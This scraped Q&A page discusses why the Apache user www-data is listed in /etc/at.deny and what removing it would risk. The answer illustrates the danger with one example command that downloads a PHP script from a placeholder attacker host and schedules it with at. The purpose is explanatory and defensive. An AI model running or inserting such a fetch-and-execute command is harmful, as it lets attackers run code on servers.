Ping a Specific Port

Question

Jamie

Asked: 2013-11-21 10:04:08 +0800 CST2013-11-21 10:04:08 +0800 CST 2013-11-21 10:04:08 +0800 CST

Why is `www-data` (Ubuntu / Apache user) listed in the `/etc/at.deny` file?

772

I have a cgi script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page. My thought was to do this using the at command from a python call (os.system("at now + 5 minutes <<< ' python resend.py data'")). Testing revealed:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

What sort of grief am I exposing myself to if I remove user 'www-data' from the /etc/at.deny file?

1 Answers

Voted

nandoP · Answer 1 · 2013-11-21T10:11:49+08:00

Best Answer

nandoP

2013-11-21T10:11:49+08:002013-11-21T10:11:49+08:00

by making that proposed change, you are allowing the user apache runs as to execute jobs in the future, at a later time.... i dunno this is possible, but if you where able to subvert a webserver to execute serverside something like

exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")

this would exec that downloaded php script, at a later time.

its basically one time cron, and to be honest, i usually disable it, in favor of jenkins.

0

Why is `www-data` (Ubuntu / Apache user) listed in the `/etc/at.deny` file?

Can you pass user/pass for HTTP Basic Authentication in URL parameters?

Ping a Specific Port

Check if port is open or closed on a Linux server?

How to automate SSH login with password?

How do I tell Git for Windows where to find my private RSA key?

What's the default superuser username/password for postgres after a new install?

What port does SFTP use?

Command line to list users in a Windows Active Directory group?

What is a Pem file and how does it differ from other OpenSSL Generated Key File Formats?

How to determine if a bash variable is empty?